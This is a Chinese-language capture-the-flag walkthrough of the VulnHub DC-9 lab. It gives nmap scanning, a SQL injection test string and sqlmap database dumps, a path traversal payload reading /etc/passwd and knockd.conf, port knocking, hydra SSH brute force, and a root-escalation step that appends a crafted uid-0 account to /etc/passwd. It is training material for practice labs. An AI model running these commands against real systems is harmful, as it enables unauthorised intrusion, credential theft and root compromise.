靶場擷取位址
https://www.vulnhub.com/entry/dc-9,412/
網絡模式:NAT
攻擊機:kali
目錄
-
-
- 1、主機發現
- 2、存在檔案包含
- 3、knockd敲門服務
- 4、提權
-
錄)
1、主機發現
arp-scan -l
nmap -p- 192.168.194.170
80端口開放,22端口被過濾,後面會用到
可能會有SQL注入,使用1’ or 1=1#顯示全部,是以存在
使用burpsuites抓包儲存為檔案post.txt,
sqlmap爆破
sqlmap -r /home/kali/Desktop/post.txt --dbs
使用-r參數
sqlmap -r /home/kali/Desktop/post.txt -D users --tables
sqlmap -r /home/kali/Desktop/post.txt -D users -T UserDetails --columns
sqlmap -r /home/kali/Desktop/post.txt -D users -T UserDetails -C username,password --dump
還有另一個staff庫
使用admin 和 transorbital1登入
發現
File does not exist
2、存在檔案包含
試下常見參數得到為file
http://192.168.194.170/manage.php?file=…/…/…/…/…/…/etc/passwd
3、knockd敲門服務
http://192.168.194.170/manage.php?file=…/…/…/…/…/…/etc/knockd.conf
通過看源檔案更清晰
敲門 Knockd,敲擊方法:nc、nmap,參考
此時22端口開放
使用之前爆破的使用者密碼進行hydra爆破
hydra -L dc9pass -P dc9pass2 192.168.194.170 ssh -t 20
對這賬号都嘗試進行登陸,隻有janitor的家目錄存在一個名為.secrets-for-putin的檔案夾,并且在其中又得到一些密碼
4、提權
參考
#python test.py read append 讀取内容追加内容的意思
openssl passwd -1 -salt admin 123456
1 1 1admin$LClYcRe.ee8dQwgrFc5nz.
echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/passwd
cd /opt/devstuff/dist/test
sudo ./test /tmp/passwd /etc/passwd